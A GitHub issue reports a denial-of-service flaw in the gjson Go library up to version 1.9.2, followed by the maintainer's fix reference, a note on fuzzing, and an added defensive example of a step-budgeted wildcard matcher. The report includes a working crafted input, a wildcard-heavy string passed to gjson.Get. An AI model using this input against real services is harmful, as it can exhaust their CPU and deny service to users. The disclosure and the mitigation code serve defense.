gjson.Get can cause DoS attacks. GJSON <= 1.9.2 allows attackers to cause a redos via crafted JSON input. #237

Closed
cmdrgh opened this issue Oct 8, 2021 · 2 comments


cmdrgh commented Oct 8, 2021

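```go
package main

import "github.com/tidwall/gjson"

func main() {
	testJson := `#[%"*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,,,,,,""*,*"]`
	gjson.Get(testJson, testJson) // the same string is passed as both the JSON and the path
}
```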

tidwall (Owner) commented Oct 8, 2021

Fixed in 77a57fd
Thanks for reporting.

AdamKorcz commented

@tidwall This is something that would be caught by fuzzing gjson continuously: google/oss-fuzz#6901
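The report above passes a `%` pattern packed with `*` wildcards. As an added example (not gjson's code and not the fix in 77a57fd), the sketch below shows one way to bound that class of cost: a backtracking wildcard matcher that spends a step budget and gives up when it runs out. It assumes the slowdown comes from backtracking over the wildcards; `matchBudget`, `SafeMatch` and the sample inputs are hypothetical names and constructed data.

```go
package main

import (
	"fmt"
	"strings"
)

// matchBudget reports whether str matches pat ('*' = any run of bytes,
// '?' = any single byte). Each call spends one unit of budget; once the
// budget is gone the search is abandoned and stopped is true.
func matchBudget(str, pat string, budget *int) (matched, stopped bool) {
	if *budget <= 0 {
		return false, true
	}
	*budget--
	if pat == "" {
		return str == "", false
	}
	if pat[0] == '*' {
		// Try every possible length for the run consumed by '*'.
		for i := 0; i <= len(str); i++ {
			m, s := matchBudget(str[i:], pat[1:], budget)
			if m || s {
				return m, s
			}
		}
		return false, false
	}
	if str == "" || (pat[0] != '?' && pat[0] != str[0]) {
		return false, false
	}
	return matchBudget(str[1:], pat[1:], budget)
}

// SafeMatch (hypothetical wrapper) treats input that exceeds maxSteps as
// "no match" and flags it, instead of letting it pin a CPU core.
func SafeMatch(str, pat string, maxSteps int) (matched, stopped bool, used int) {
	budget := maxSteps
	matched, stopped = matchBudget(str, pat, &budget)
	return matched, stopped, maxSteps - budget
}

func main() {
	// Constructed inputs: the final literal can never match the subject.
	pat := strings.Repeat("*,", 30) + "x"
	subject := strings.Repeat(",", 40)
	fmt.Println(SafeMatch("a,b,c", "*,b,*", 10000)) // benign pattern
	fmt.Println(SafeMatch(subject, pat, 10000))     // cut off by the budget
}
```

A `stopped` result is worth logging together with the input size, since it marks a pattern that would otherwise have run unbounded.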
